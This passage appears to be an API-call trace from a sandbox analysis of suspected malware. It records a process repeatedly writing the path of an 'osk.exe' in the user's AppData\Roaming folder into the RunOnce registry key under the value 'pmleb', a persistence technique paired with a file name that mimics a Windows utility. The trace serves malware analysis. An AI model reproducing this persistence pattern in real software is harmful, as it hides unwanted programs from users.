(lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.724] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.724] RegCloseKey (hKey=0x280) returned 0x0 [0080.724] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.724] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.724] SetTimer (hWnd=0x20280, nIDEvent=0x2089, uElapse=0xa, lpTimerFunc=0x0) returned 0x2089 [0080.724] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.735] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.735] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.736] KillTimer (hWnd=0x20280, uIDEvent=0x2089) returned 1 [0080.736] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.736] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.736] IUnknown:Release (This=0x787518) returned 0x1 [0080.736] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.736] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.736] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.736] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.737] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.737] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.737] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.737] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.737] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.737] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xe [0080.737] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.737] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xf [0080.737] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.738] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xe [0080.738] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.738] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.738] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.738] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.738] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.738] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.738] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.738] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.739] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.739] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.739] RegCloseKey (hKey=0x280) returned 0x0 [0080.739] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.739] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.739] SetTimer (hWnd=0x20280, nIDEvent=0x208a, uElapse=0xa, lpTimerFunc=0x0) returned 0x208a [0080.739] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.751] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.751] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.751] KillTimer (hWnd=0x20280, uIDEvent=0x208a) returned 1 [0080.751] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.751] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.752] IUnknown:Release (This=0x787518) returned 0x1 [0080.752] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.752] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.752] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.752] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.752] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.752] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.752] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.752] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.752] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.752] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xf [0080.752] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.753] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x10 [0080.753] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.753] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xf [0080.753] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.754] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.754] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.754] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.754] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.754] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.754] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.754] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.754] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.754] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.754] RegCloseKey (hKey=0x280) returned 0x0 [0080.755] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.755] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.755] SetTimer (hWnd=0x20280, nIDEvent=0x208b, uElapse=0xa, lpTimerFunc=0x0) returned 0x208b [0080.755] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.767] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.767] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.767] KillTimer (hWnd=0x20280, uIDEvent=0x208b) returned 1 [0080.767] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.767] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.767] IUnknown:Release (This=0x787518) returned 0x1 [0080.767] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.767] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.767] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.768] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.768] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.768] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.768] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.768] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.768] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.768] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x10 [0080.768] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.768] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x11 [0080.768] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.769] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x10 [0080.769] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.769] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.769] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.769] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.769] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.769] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.769] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.769] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 